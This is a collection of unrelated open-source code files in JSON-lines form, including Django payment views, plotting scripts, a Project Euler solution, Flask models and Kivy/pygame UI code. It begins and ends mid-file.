render(request, 'account/pendingrequests.html', context)\n\n\n@login_required\ndef transaction_history(request):\n user = request.user\n sender_transactions = Transaction.objects.filter(sender=user)\n recipient_transactions = Transaction.objects.filter(recipient=user)\n transactions = sender_transactions | recipient_transactions\n transactions = transactions.order_by('-timestamp')\n return render(request, 'account/transaction_history.html', {'transactions': transactions})\n\n\n@login_required\n@transaction.atomic\ndef handle_request(request, request_id, action):\n pay_request = get_object_or_404(PayRequest, pk=request_id)\n if pay_request.recipient != request.user:\n return redirect('pendingrequests')\n if action == 'accept':\n recipient = get_object_or_404(CustomUser, username=pay_request.sender)\n amount = pay_request.amount\n sender = request.user\n currency = recipient.currency\n\n if sender.account_balance < amount:\n messages.error(request, 'Insufficient balance')\n return redirect('pendingrequests')\n if sender.currency != recipient.currency:\n url = f'{sender.currency}/{recipient.currency}/{amount}'\n absolute_uri = request.build_absolute_uri('/conversion/' + url)\n response = requests.get(absolute_uri)\n if response.status_code == 200:\n serializer = ConvertedCurrencySerializer(data=response.json())\n if serializer.is_valid():\n conversion_response = ConvertedCurrency(serializer.validated_data['rate'],\n serializer.validated_data['is_success'])\n if conversion_response.is_success:\n converted_amount = conversion_response.rate * amount\n converted_amount = Decimal(converted_amount)\n else:\n messages.error(request, 'Your currency could not be converted.')\n else:\n messages.error(request, f\"Conversion API returned status code {response.status_code}\")\n else:\n converted_amount = amount\n\n # Carry out payment\n sender.account_balance -= amount\n recipient.account_balance += converted_amount\n sender.save()\n recipient.save()\n\n # Record the transaction in the database\n transaction = Transaction(sender=sender, recipient=recipient, amount=converted_amount, timestamp=timezone.now(),\n currency=currency)\n transaction.save()\n pay_request.delete()\n messages.success(request, \"Transfer complete\")\n elif action == 'reject':\n pay_request.delete()\n return redirect('pendingrequests')\n\n\n@login_required\ndef notifications(request):\n notifications = Notification.objects.filter(user=request.user, unread=True).order_by('-timestamp')\n messages.success(request, 'Notification view called')\n return render(request, 'account/notifications.html', {'notifications': notifications})\n\n\n@login_required\n@csrf_exempt\ndef mark_as_read(request):\n if request.method == 'POST':\n Notification.objects.filter(user=request.user, unread=True).update(unread=False)\n return JsonResponse({'success': True})\n\n\n@receiver(post_save, sender=Transaction)\ndef notify_transaction(sender, instance, **kwargs):\n if instance.recipient:\n message = f\"You received a payment of {instance.amount:.2f} {instance.currency.upper()} from {instance.sender.username}.\"\n Notification.objects.create(user=instance.recipient, message=message)\n\n\n@receiver(post_save, sender=PayRequest)\ndef notify_pay_request(sender, instance, **kwargs):\n if instance.recipient:\n message = f\"You received a payment request of {instance.amount:.2f} {instance.currency.upper()} from {instance.sender.username}.\"\n url = '/account/pendingrequests'\n Notification.objects.create(user=instance.recipient, message=message, url=url)\n","repo_name":"arjunjoshua/Payment_Application","sub_path":"account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74130017834","text":"import pdb\nfrom threading import Lock\n\nimport numpy as np\n\nimport tensorflow as tf\nfrom absl import logging\nfrom absl.testing import absltest\nfrom liaison.env.rins import Env\nfrom liaison.utils import ConfigDict\n\nB = 8\nT = 9\nN_ACTIONS = 2\nlock = Lock()\n\n\nclass RinsEnvTest(absltest.TestCase):\n\n def _get_env(self):\n return Env(0,\n seed=42,\n graph_seed=42,\n make_obs_for_mlp=False,\n make_obs_for_self_attention=False,\n k=40,\n steps_per_episode=180,\n dataset='milp-facilities-10')\n\n def _print_done(self):\n with lock:\n for _ in range(10):\n print('*', end='')\n print('\\nTest done')\n for _ in range(10):\n print('*', end='')\n print('\\n')\n\n def testStep(self):\n env = self._get_env()\n ts = env.reset()\n for i in range(500):\n obs = ts.observation\n mask = obs['node_mask']\n assert np.sum(mask) > 0\n act = np.random.choice(range(len(mask)), p=mask / np.sum(mask))\n ts = env.step(act)\n print(ts.reward, env._prev_obj, env._curr_obj)\n pdb.set_trace()\n # print(obs['log_values']['best_ep_return'],\n # obs['log_values']['final_ep_return'])\n\n self._print_done()\n\n\nif __name__ == '__main__':\n absltest.main()\n","repo_name":"aravic/liaison","sub_path":"liaison/tests/env/rins_test.py","file_name":"rins_test.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70209242152","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# Script to visualize neuron firings.\n#\n\nimport sys, os\nimport numpy as np\nimport time\nimport pickle\nimport argparse\nimport py_reader # reader utility for opendihu *.py files\n\nshow_plot = True\n\n# import needed packages from matplotlib\nimport matplotlib as mpl\nif not show_plot:\n mpl.use('Agg')\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nfrom matplotlib import animation\nfrom matplotlib import cm\nfrom matplotlib.patches import Polygon\nimport matplotlib.gridspec as gridspec\n\n# get all input data in current directory\nfilenames = os.listdir(\"out\")\n\nparallel = False\nsuffix = \".py\"\nif parallel:\n suffix = \".0.py\"\n\nparser = argparse.ArgumentParser(description='plot_spindles')\nparser.add_argument('--store_frequency_file', default=\"\")\nparser.add_argument('--load_frequency_file', default=\"\")\nparser.add_argument('--plot_firing_times', default=False, action=\"store_true\")\nparser.add_argument('--plot_frequency_progression', default=False, action=\"store_true\")\nparser.add_argument('--end_time', type=float, default=np.inf)\nparser.add_argument('--start_time', type=float, default=0)\nparser.add_argument('--files_stride', type=int, default=1)\nargs = parser.parse_args()\n\nif args.plot_firing_times:\n print(\"plot firing times\")\n \nif args.plot_frequency_progression:\n print(\"plot frequency progression\")\n\nif args.end_time < np.inf or args.start_time > 0:\n print(\"restrict data to [{},{}]\".format(args.start_time,args.end_time))\n\nprint(\"store_frequency_file: \\\"{}\\\"\\nload_frequency_file: \\\"{}\\\"\".format(args.store_frequency_file, args.load_frequency_file))\n\n# collect the filenames\ncondition = lambda filename: suffix in filename and \"muscle_spindles\" in filename\nmuscle_spindles_files = [\"out/{}\".format(filename) for filename in sorted(list(np.extract(np.array(list(map(condition, filenames))), filenames)))]\nmuscle_spindles_files = muscle_spindles_files[::args.files_stride]\n\n\ncondition = lambda filename: suffix in filename and \"motoneurons\" in filename\nmotoneurons_files = [\"out/{}\".format(filename) for filename in sorted(list(np.extract(np.array(list(map(condition, filenames))), filenames)))]\nmotoneurons_files = motoneurons_files[::args.files_stride]\n\nprint(\"Number of input files: muscle spindles: {}, motoneurons: {}\".\\\n format(len(muscle_spindles_files), len(motoneurons_files)))\n\n\n# load data\nmuscle_spindles_data = py_reader.load_data(muscle_spindles_files)\nmotoneurons_data = py_reader.load_data(motoneurons_files)\n\n# create plots\n\nif not args.plot_frequency_progression:\n fig,axes = plt.subplots(2,2,figsize=(12,6),sharex=True, gridspec_kw={'width_ratios': [10, 1]})\nelse:\n fig,axes = plt.subplots(3,2,figsize=(12,8),sharex=True, gridspec_kw={'width_ratios': [10, 1], \"height_ratios\": [1,1,0.5]})\n\n# set global parameters for font sizes\nplt.rcParams.update({\n 'lines.linewidth': 2,\n 'lines.markersize': 10,\n 'lines.markeredgewidth': 2,\n 'font.size': 10,\n 'axes.labelsize': 10,\n 'xtick.labelsize': 10,\n 'ytick.labelsize': 10,\n})\n\n# ---------------------\n# plot muscle spindles\ncomponent_name_input = \"(P)modell/L\"\ncomponent_name_output = \"modell/primary_afferent\"\n\nt_values = None\nvalues_output = None\nvalues_input = None\n\n# loop over datasets at different times\nfor i,dataset in enumerate(muscle_spindles_data):\n \n # get the data for the current timestep\n data_input = py_reader.get_values(dataset, \"parameters\", component_name_input)\n data_output = py_reader.get_values(dataset, \"algebraics\", component_name_output)\n \n if data_input is None:\n print(\"No data found for muscle spindles or component '{}' does not exist.\\n\".format(component_name_input))\n if data_output is None:\n print(\"No data found for muscle spindles or component '{}' does not exist.\\n\".format(component_name_output))\n \n # create arrays the first time\n if values_output is None:\n values_input = np.zeros((len(data_input), len(muscle_spindles_data))) # each column is the data for one timestep, for multiple neurons\n values_output = np.zeros((len(data_output), len(muscle_spindles_data))) # each column is the data for one timestep, for multiple neurons\n t_values = np.zeros((len(muscle_spindles_data)))\n \n # store values\n values_input[:,i] = data_input\n values_output[:,i] = data_output\n t_values[i] = dataset['currentTime']\n\n# restrict data to specified end_time\nstart_index = None\nfor i in range(len(t_values)):\n if t_values[i] >= args.start_time and start_index is None:\n start_index = i\n if t_values[i] > args.end_time:\n end_index = i\n t_values = t_values[start_index:end_index]\n values_input = values_input[:,start_index:end_index]\n values_output = values_output[:,start_index:end_index]\n break\nif args.end_time == np.inf:\n t_values = t_values[start_index:]\n values_input = values_input[:,start_index:]\n values_output = values_output[:,start_index:]\n \n# plot lines for all timesteps\n# loop over neurons\nn = values_output.shape[0]\naxes[0,0].plot([0,max(t_values)],[1,1], \":\", color=(0.5,0.5,0.5))\nfor i in range(n):\n color = next(axes[0,0]._get_lines.prop_cycler)['color']\n axes[0,0].plot(t_values, values_input[i,:], ':', color=color)\n if i == 0:\n ax2 = axes[0,0].twinx()\n ax2.plot(t_values, values_output[i,:], '-', color=color)\n\n# set title and axis labels\naxes[0,0].set_title('Muscle spindles (number: {})'.format(n))\naxes[0,0].set_ylabel('Sensed muscle stretch\\n(dotted lines)', fontsize=12)\naxes[0,0].grid(axis=\"x\")\nax2.set_ylabel('Spindle response [mV]\\n(solid lines)', fontsize=12)\n\n# ---------------------\n# plot motoneurons\ncomponent_name_input = \"(P)motor_neuron/drive\"\ncomponent_name_output = \"motor_neuron/V_s\"\n\nt_values = None\nvalues_output = None\nvalues_input = None\n\n# loop over datasets at different times\nfor i,dataset in enumerate(motoneurons_data):\n \n # get the data for the current timestep\n data_input = py_reader.get_values(dataset, \"parameters\", component_name_input)\n data_output = py_reader.get_values(dataset, \"solution\", component_name_output)\n \n if data_input is None:\n print(\"No data found for motoneurons or component '{}' does not exist.\\n\".format(component_name_input))\n if data_output is None:\n print(\"No data found for motoneurons or component '{}' does not exist.\\n\".format(component_name_output))\n \n # create arrays the first time\n if values_output is None:\n values_input = np.zeros((len(data_output), len(motoneurons_data))) # each column is the data for one timestep, for multiple neurons\n values_output = np.zeros((len(data_output), len(motoneurons_data))) # each column is the data for one timestep, for multiple neurons\n t_values = np.zeros((len(motoneurons_data)))\n \n # store values\n values_input[:,i] = data_input\n values_output[:,i] = data_output\n t_values[i] = dataset['currentTime']\n\n# restrict data to specified end_time\nstart_index = None\nfor i in range(len(t_values)):\n if t_values[i] >= args.start_time and start_index is None:\n start_index = i\n if t_values[i] > args.end_time:\n end_index = i\n print(\"start_index: {}, end_index: {}\".format(start_index, end_index))\n t_values = t_values[start_index:end_index]\n values_input = values_input[:,start_index:end_index]\n values_output = values_output[:,start_index:end_index]\n break\nif args.end_time == np.inf:\n print(\"start_index: {}\".format(start_index))\n t_values = t_values[start_index:]\n values_input = values_input[:,start_index:]\n values_output = values_output[:,start_index:]\n\nif args.plot_firing_times:\n # ------\n # plot only firing times\n \n n_motor_units = values_output.shape[0]\n end_time = np.max(t_values)\n firing_threshold = np.mean(values_output)*3\n print(\"firing threshold: {}\".format(firing_threshold))\n \n firing_times_mu = []\n for mu_no in range(n_motor_units):\n times = []\n current_value_active = False\n for i,value in enumerate(values_output[mu_no,:]):\n if value > firing_threshold and not current_value_active:\n current_value_active = True\n times.append(t_values[i])\n else:\n current_value_active = False\n firing_times_mu.append(times)\n #axes[1].plot(t_values, values_output[i,:], '-', color=\"k\")\n \n print(\"end time: {}\".format(end_time))\n \n # determine frequencies\n frequencies_mus = []\n for times in firing_times_mu:\n \n f = 1000 / (times[1]-times[0])\n frequencies = [f]\n for i in range(1,len(times)-1):\n f = 2000 / (times[i+1]-times[i-1])\n frequencies.append(f)\n frequencies.append(f)\n \n frequencies = np.array(frequencies)\n frequencies_mus.append(frequencies)\n \n min_frequency = np.min([np.min(m) for m in frequencies_mus])\n max_frequency = np.max([np.max(m) for m in frequencies_mus])\n \n norm = matplotlib.colors.Normalize(vmin=min_frequency,vmax=max_frequency)\n fig.colorbar(cm.ScalarMappable(norm=norm, cmap=matplotlib.cm.viridis), ax=axes[1,1], pad=0.1, panchor=(0.0, 0.5))\n \n # plot line for each MU\n for (mu_no,times) in enumerate(firing_times_mu):\n \n axes[1,0].plot([0,end_time],[mu_no+1,mu_no+1],\"k-\")\n\n # plot stimulation times as vertical bar\n bar_height = 0.2\n \n color_values = (frequencies_mus[mu_no] - min_frequency) / (max_frequency-min_frequency)\n colors = matplotlib.cm.viridis(color_values)\n \n for i,t in enumerate(list(times)):\n axes[1,0].plot(t, mu_no+1, marker=\"+\", color=colors[i])\n \n #axes[1].plot(list(times),[mu_no+1 for _ in times],marker=\"+\",color=colors)\n \n # set title and axis labels\n axes[1,0].set_title('Motor neurons (number: {})'.format(n_motor_units))\n #axes[1,0].set_xlabel('time [ms]', fontsize=12)\n axes[1,0].set_ylabel('Motor units [-]', fontsize=12)\n axes[1,0].grid(axis=\"x\")\n \n if args.plot_frequency_progression:\n l = []\n for mu_no in range(len(firing_times_mu)):\n for i in range(len(firing_times_mu[mu_no])):\n l.append((frequencies_mus[mu_no][i], firing_times_mu[mu_no][i]))\n freq_times = sorted(l, key=lambda a: a[1])\n \n fs = [x[0] for x in freq_times]\n ts = [x[1] for x in freq_times]\n \n ts = np.array([ts]).reshape(-1, 1)\n fs = np.array([fs]).reshape(-1, 1)\n \n #print(\"fs: {}\".format(fs))\n #print(\"ts: {}\".format(ts))\n \n # GPR, hyperparameters such as kernel width will be optimized\n from sklearn.gaussian_process import GaussianProcessRegressor\n from sklearn.gaussian_process.kernels import DotProduct, WhiteKernel, RBF, ConstantKernel\n \n kernel = ConstantKernel(constant_value=1.0) + RBF(length_scale=800, length_scale_bounds=(800.0, 1000.0))\n gpr = GaussianProcessRegressor(kernel=kernel).fit(ts, fs)\n \n frequency_values = gpr.predict(np.array([t_values]).reshape(-1,1))\n #print(\"frequency_values: {}\".format(frequency_values))\n \n axes[2,0].plot(t_values, frequency_values, '-', label=\"With spindles\")\n \n if args.load_frequency_file != \"\":\n with open(args.load_frequency_file, \"rb\") as f:\n (other_t_values,other_frequency_values) = pickle.load(f)\n \n n_values = min(len(other_frequency_values), len(t_values))\n \n axes[2,0].plot(other_t_values[0:n_values], other_frequency_values[0:n_values], '--', label=\"Without spindles\")\n \n if args.store_frequency_file != \"\":\n with open(args.store_frequency_file, \"wb\") as f:\n print(\"Dump frequency values to file \\\"{}\\\"\".format(args.store_frequency_file))\n pickle.dump((t_values,frequency_values), f)\n \n axes[2,0].set_ylim(10,max_frequency)\n \n # set title and axis labels\n axes[2,0].set_xlabel('Time [ms]', fontsize=12)\n axes[2,0].set_ylabel('Firing frequency [Hz]', fontsize=12)\n axes[2,0].legend()\n axes[2,0].grid(axis=\"x\")\n \n axes[2,1].set_visible(False)\n \nelse:\n\n # ------\n # plot lines for all timesteps\n # loop over neurons\n n = values_output.shape[0]\n for i in range(n):\n color = next(axes[1,0]._get_lines.prop_cycler)['color']\n axes[1,0].plot(t_values, values_output[i,:], '-', color=color)\n if i == 0:\n ax2 = axes[1,0].twinx()\n ax2.plot(t_values, values_input[i,:], ':', color=color)\n \n # set title and axis labels\n axes[1,0].set_title('Motor neurons (number: {})'.format(n))\n axes[1,0].set_xlabel('time [ms]', fontsize=12)\n axes[1,0].set_ylabel('voltage [mV]\\n(solid lines)', fontsize=12)\n ax2.set_ylabel('input current [uA]\\n(dotted lines)', fontsize=12)\n\naxes[0,1].set_visible(False)\naxes[1,1].set_visible(False)\n\n# show plot window\nplt.tight_layout()\nplt.savefig(\"plot.png\")\nplt.savefig(\"plot.pdf\")\nplt.show()\n","repo_name":"maierbn/opendihu","sub_path":"examples/electrophysiology/neuromuscular/spindles_fibers/plot_spindles.py","file_name":"plot_spindles.py","file_ext":"py","file_size_in_byte":12578,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"72"} +{"seq_id":"12844819245","text":"import time \nimport os\nimport sys\nsys.path.append(os.path.join(os.path.dirname(os.path.dirname(os.getcwd())),'Utils'))\nfrom arithm import new_decmpo\n\n\nproblem_number = 622\ntest_input = 8\ntest_solution = 412\nproblem_input = 60\n\n\ndef s(n):\n #n is even > 4\n exp = 1\n r = 2\n while r != 1:\n r *= 2\n r = r%(n - 1)\n exp += 1\n return exp\n \n\n#Solution\n\n\ndef solution(limit):\n result = []\n \n decompo = new_decmpo(2**limit - 1)\n divisor = [decompo[0][0]**i for i in range(0, decompo[0][1] + 1)]\n \n for i in range(1, len(decompo)):\n new_divisor = []\n for div in divisor:\n new_divisor += [div*decompo[i][0]**j for j in range(0, decompo[i][1] + 1)]\n divisor = new_divisor\n \n divisor.remove(1)\n for d in divisor:\n if s(d + 1) == limit:\n result.append(d + 1)\n \n return sum(result)\n\n\n#Test & Result\n\n\nfichier = open(\"Solution \"+str(problem_number)+\".txt\", \"w\")\nstring = \"\"\n\nbegin_test = time.time()\ntest_value = solution(test_input)\nend_test = time.time()\ntest_time = end_test - begin_test\n\nstring += \"TEST #1\\n\\n\"\nstring += \"Input: \"+str(test_input)+\"\\n\"\nstring += \"Output: \"+str(test_value)+\"\\n\"\nstring += \"Answer: \"+str(test_solution)+\"\\n\"\nstring += \"Computation time: \"+str(test_time)+\" sec\\n\"\nstring += \"Verification: \"\n\nif(test_value == test_solution):\n string += \"TRUE\"\nelse:\n string += \"FALSE\"\n \n\nbegin_problem = time.time()\nproblem_value = solution(problem_input)\nend_problem = time.time()\nproblem_time = end_problem - begin_problem\n\nstring += \"\\n\\n\\nRESULT PROBLEM #\"+str(problem_number)+\"\\n\\n\"\nstring += \"Input: \"+str(problem_input)+\"\\n\"\nstring += \"Output: \"+str(problem_value)+\"\\n\"\nstring += \"Computation time: \"+str(problem_time)+\" sec\\n\"\n\nstring += \"\\n\\n\\nCurrent date & time: \" + time.strftime(\"%c\")\n\nfichier.write(string)\nfichier.close()\n","repo_name":"FrancoisdeFouchecour/Projet-Euler","sub_path":"Problems/622-Problem/Problem 622.py","file_name":"Problem 622.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"73851916711","text":"\"\"\"\ndatabase.py\n\nContains classes for database table objects\n\"\"\"\n\nfrom flask.ext.sqlalchemy import SQLAlchemy\nimport flask.ext.whooshalchemy as whooshalchemy\nfrom plc3bo import app\n\ndb = SQLAlchemy(app)\n\n\nclass BNFCategory(db.Model):\n __tablename__ = 'bnf_category'\n __searchable__ = ['name']\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(255))\n lowercasename = db.Column(db.String(255), primary_key=True)\n\n parent_id = db.Column(db.Integer, db.ForeignKey('bnf_category.id'))\n parent = db.relationship('BNFCategory',\n remote_side=[id],\n backref=db.backref('children',\n lazy='dynamic',\n order_by=name\n )\n )\n\n def __init__(self, name, parent=None):\n self.name = name\n self.lowercasename = name.lower()\n\n if isinstance(parent, BNFCategory):\n self.parent = parent\n else:\n self.parent_id = parent\n\n def __repr__(self):\n return \"\" % self.name\n\n\nclass BNFChemical(db.Model):\n __tablename__ = 'bnf_chemical'\n __searchable__ = ['name']\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(255))\n lowercasename = db.Column(db.String(255), primary_key=True)\n\n def __init__(self, name):\n self.name = name\n self.lowercasename = name.lower()\n\n def __repr__(self):\n return \"\" % self.name\n\n\nclass BNFDrug(db.Model):\n __tablename__ = 'bnf_drug'\n __searchable__ = ['name']\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(255))\n lowercasename = db.Column(db.String(255), primary_key=True)\n\n form = db.Column(db.String(50))\n dosage = db.Column(db.String(50))\n qty_unit = db.Column(db.Enum('unit', 'millilitre', 'gram', 'other'))\n prep_class = db.Column(db.Integer)\n\n chemical_id = db.Column(db.Integer, db.ForeignKey('bnf_chemical.id'))\n chemical = db.relationship('BNFChemical',\n backref=db.backref('drugs',\n lazy='dynamic'\n )\n )\n\n category_id = db.Column(db.Integer, db.ForeignKey('bnf_category.id'))\n category = db.relationship('BNFCategory',\n backref=db.backref('drugs',\n lazy='dynamic'\n )\n )\n\n def __init__(self,\n name,\n chemical,\n category,\n form=None,\n dosage=None,\n qty_unit=None,\n prep_class=None):\n self.name = name\n self.lowercasename = name.lower()\n self.form = form\n self.dosage = dosage\n self.qty_unit = qty_unit\n self.prep_class = prep_class\n\n if isinstance(category, BNFCategory):\n self.category = category\n else:\n self.category_id = category\n\n if isinstance(chemical, BNFChemical):\n self.chemical = chemical\n else:\n self.chemical_id = chemical\n\n\nclass Statistic(db.Model):\n __tablename__ = 'statistic'\n\n id = db.Column(db.Integer, primary_key=True)\n year = db.Column(db.Integer)\n\n drug_id = db.Column(db.Integer, db.ForeignKey('bnf_drug.id'))\n drug = db.relationship('BNFDrug',\n backref=db.backref('statistics',\n lazy='dynamic'\n )\n )\n\n items = db.Column(db.Integer)\n quantity = db.Column(db.Integer)\n owc2 = db.Column(db.Integer)\n nic = db.Column(db.Integer)\n\n def __init__(self,\n drug,\n year,\n items=None,\n quantity=None,\n owc2=None,\n nic=None):\n self.items = items\n self.quantity = quantity\n self.owc2 = owc2\n self.nic = nic\n self.year = year\n\n if isinstance(drug, BNFDrug):\n self.drug = drug\n else:\n self.drug_id = drug\n\n def __repr__(self):\n return \"\" % self.id\n\n def todict(self):\n return {\"items\": self.items,\n \"quantity\": self.quantity,\n \"owc2\": self.owc2,\n \"nic\": self.nic,\n \"year\": str(self.year),\n \"costp\": float(self.nic) / float(self.items),\n \"costi\": float(self.nic) / float(self.quantity),\n \"iperp\": float(self.quantity) / float(self.items)}\n\n\nwhooshalchemy.whoosh_index(app, BNFDrug)\nwhooshalchemy.whoosh_index(app, BNFCategory)\nwhooshalchemy.whoosh_index(app, BNFChemical)\n","repo_name":"toastwaffle/plc3bo","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":5028,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"4410044486","text":"import pygame\nfrom configuracion import *\n\nclass Enemigo(pygame.sprite.Sprite):\n def __init__(self, path_imagen, ubicacion, tamanio: tuple, velocidad: int) -> None:\n super().__init__()\n self.image = pygame.transform.scale(pygame.image.load(path_imagen).convert_alpha(), tamanio)\n self.rect = self.image.get_rect()\n self.rect.center = ubicacion\n self.velocidad = velocidad\n \n def update(self):\n \"\"\"update Actualiza constantemente a los enemigos\n \"\"\" \n self.mover_enemigo()\n \n def mover_enemigo(self):\n \"\"\"mover_enemigo Se encarga de hacer que los enemigos caigan y en caso de salir de la pantalla vuelven a aparece arriba\n \"\"\" \n self.rect.y += self.velocidad\n if self.rect.y > PANTALLA_BOTTOM:\n self.rect.y = PANTALLA_TOP\n","repo_name":"GonzaloCossa/Cossa.Gonzalo.P2.LabI.1A","sub_path":"SPLab_1/src/enemigo.py","file_name":"enemigo.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"42335848771","text":"import pytest\nimport mock\n\nimport ckan.model as model\nimport ckan.plugins.toolkit as tk\nimport ckan.tests.factories as factories\nimport ckan.tests.helpers as helpers\n\n_get_action = tk.get_action\nNotAuthorized = tk.NotAuthorized\n\n\n@pytest.mark.usefixtures('keep_db_tables_on_clean', 'clean_db', 'with_request_context')\nclass TestApiTokenCreationEmail(object):\n\n SYSADMIN_EMAIL = 'token_sysadmin@test.org'\n USER_EMAIL = 'token_testuser@test.org'\n\n @mock.patch('ckanext.hdx_users.helpers.token_creation_notification_helper._mail_recipient')\n def test_notify_users_about_api_token_creation(self, mail_recipient_mock):\n '''\n :param mail_recipient_mock:\n :type mail_recipient_mock: mock.MagicMock\n :return:\n '''\n sysadmin = factories.Sysadmin(email=self.SYSADMIN_EMAIL)\n context_sysadmin = {\n 'model': model,\n 'user': sysadmin['name']\n }\n\n token_owner = factories.User(name='testuser', email=self.USER_EMAIL, fullname='Test User')\n context_owner = {\n 'model': model,\n 'user': token_owner['name']\n }\n\n helpers.call_action('api_token_create', context=context_sysadmin, user=token_owner['name'], name='token-sys-1',\n expires_in=5, unit=24 * 60 * 60)\n assert mail_recipient_mock.call_count == 1\n assert mail_recipient_mock.call_args[0][1] == self.USER_EMAIL\n\n helpers.call_action('api_token_create', context=context_owner, user=token_owner['name'], name='token-u1-1',\n expires_in=5, unit=24 * 60 * 60)\n assert mail_recipient_mock.call_count == 2\n assert mail_recipient_mock.call_args[0][1] == self.USER_EMAIL\n","repo_name":"OCHA-DAP/hdx-ckan","sub_path":"ckanext-hdx_users/ckanext/hdx_users/tests/test_emails/test_api_token_creation_email.py","file_name":"test_api_token_creation_email.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"72"} +{"seq_id":"10075617401","text":"\nimport kivy\nfrom kivy.uix.widget import Widget\nfrom kivy.core.text import Label as textLabel\nfrom kivy.uix.label import Label as KiLabel\nfrom kivy.uix.textinput import TextInput\nfrom kivy.lang import Builder\nfrom kivy.uix.scatter import Scatter\nfrom kivy.graphics.opengl import *\nfrom kivy.graphics import *\nfrom kivy.properties import ObjectProperty\nimport sys\nimport math\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.metrics import cm\nfrom WidgetValFunctionHandler import WidgetValFunctionHandler\nfrom kivy_garden.speedmeter import SpeedMeter\nfrom kivy.uix.spinner import Spinner\nfrom WidgetHelper import WidgetHelper\nfrom MyLabel import MyLabel\nfrom kivy.uix.progressbar import ProgressBar\n \n \nclass CircularProgressBar(ProgressBar):\n\n def __init__(self, **kwargs):\n super(CircularProgressBar, self).__init__(**kwargs)\n self.thickness = 40\n self.label = textLabel(text=\"0%\", font_size=self.thickness)\n self.texture_size = None\n self.refresh_text()\n self.draw()\n\n def draw(self):\n\n with self.canvas:\n \n # Empty canvas instructions\n self.canvas.clear()\n\n # Draw no-progress circle\n Color(0.26, 0.26, 0.26)\n Ellipse(pos=self.pos, size=self.size)\n\n # Draw progress circle, small hack if there is no progress (angle_end = 0 results in full progress)\n Color(1, 0, 0)\n Ellipse(pos=self.pos, size=self.size,\n angle_end=(0.001 if self.value_normalized == 0 else self.value_normalized*360))\n\n # Draw the inner circle (colour should be equal to the background)\n Color(0, 0, 0)\n Ellipse(pos=(self.pos[0] + self.thickness / 2, self.pos[1] + self.thickness / 2),\n size=(self.size[0] - self.thickness, self.size[1] - self.thickness))\n\n # Center and draw the progress text\n Color(1, 1, 1, 1)\n #added pos[0]and pos[1] for centralizing label text whenever pos_hint is set\n Rectangle(texture=self.label.texture, size=self.texture_size,\n pos=(self.size[0] / 2 - self.texture_size[0] / 2 + self.pos[0], self.size[1] / 2 - self.texture_size[1] / 2 + self.pos[1]))\n\n\n def refresh_text(self):\n # Render the label\n self.label.refresh()\n\n # Set the texture size each refresh\n self.texture_size = list(self.label.texture.size)\n\n def set_value(self, value, title, unit):\n # Update the progress bar value\n self.value = value\n\n # Update textual value and refresh the texture\n lText = ''\n if title != '':\n lText = \"%s\\n\"%title\n lText+= str(value)\n if unit != '':\n lText+= unit \n self.label.text = lText\n self.refresh_text()\n\n # Draw all the elements\n self.draw()\n\n \nclass Widget_circularProgress(WidgetHelper):\n \n def __init__(self, **kwargs):\n \n \n self.updateCount = 0\n \n self.screen = 0\n self.size = [200,200]\n self.pos = [0,0]\n self.scale = 1.0\n self.rotation = 0.0\n self.x = 0\n self.y = 0\n \n self.myValue = None\n self.stat = {\n 'skip': 0,\n 'update': 0\n }\n self.subPix = 1.25\n \n self.mtitle = \"\"\n self.mcallback = None\n self.mvalk = \"\"\n self.munit = 1\n self.mround = 1\n self.maxnum = 4\n self.valueToDisplay = 0.0\n \n \n self.smSettings = {\n 'title': '',\n 'min': -175,\n 'max': 175,\n 'unit': '',\n 'round': 1\n }\n\n self.sm = CircularProgressBar()\n self.sm.size_hint = [None,None]\n self.sm.width = self.size[0]\n self.sm.height = self.size[1]\n self.sm.size = self.size\n self.sm.max = self.smSettings['max']\n self.sm.min = self.smSettings['min']\n self.sm.set_value(0.0,'','')\n \n \n self.wvfh = WidgetValFunctionHandler()\n #self.wvfh.setParameters()\n \n def setValues(self, \n screen, title, unit, round_ ,maxnum ):\n self.screen = screen\n self.mtitle = title\n self.munit = unit\n self.mround = round_\n self.maxnum = maxnum\n \n def settingsDoneStore(self):\n pass\n \n def settingsNeedIt(self):\n return True\n \n def setValuesFromDic(self,dic):\n print(\"Widget_circularProgress.setValuesFromDic\",dic)\n self.ImOnScreen = str(dic['screen'])\n self.smSettings['title'] = dic['title']\n self.smSettings['min'] = int(dic['min'])\n self.smSettings['max'] = int(dic['max'])\n self.smSettings['unit'] = dic['unit']\n self.smSettings['round'] = int(dic['round'])\n self.wvfh.setParametersFromDict(dic['valHandler'])\n\n self.sm.min = self.smSettings['min']\n self.sm.max = self.smSettings['max']\n \n print(\"so circular progress pos\",self.pos,\" size\",self.size)\n #sys.exit(0)\n \n def getAttrFromDialog(self):\n self.smSettings['title'] = self.ti_title.text\n self.smSettings['min'] = self.ti_min.text\n self.smSettings['max'] = self.ti_max.text\n self.smSettings['unit'] = self.ti_unit.text\n self.smSettings['round'] = self.ti_round.text\n \n return self.smSettings\n \n \n def addSettingsDialogPart(self,bl, inWConf = None):\n \n bl,self.ti_title = self.addDialogRow(bl, \"Title\", \n \"\" if inWConf == None else inWConf['atr']['title'] )\n bl,self.ti_min = self.addDialogRow(bl, \"Min value\", \n -175 if inWConf == None else str(inWConf['atr']['min']) )\n 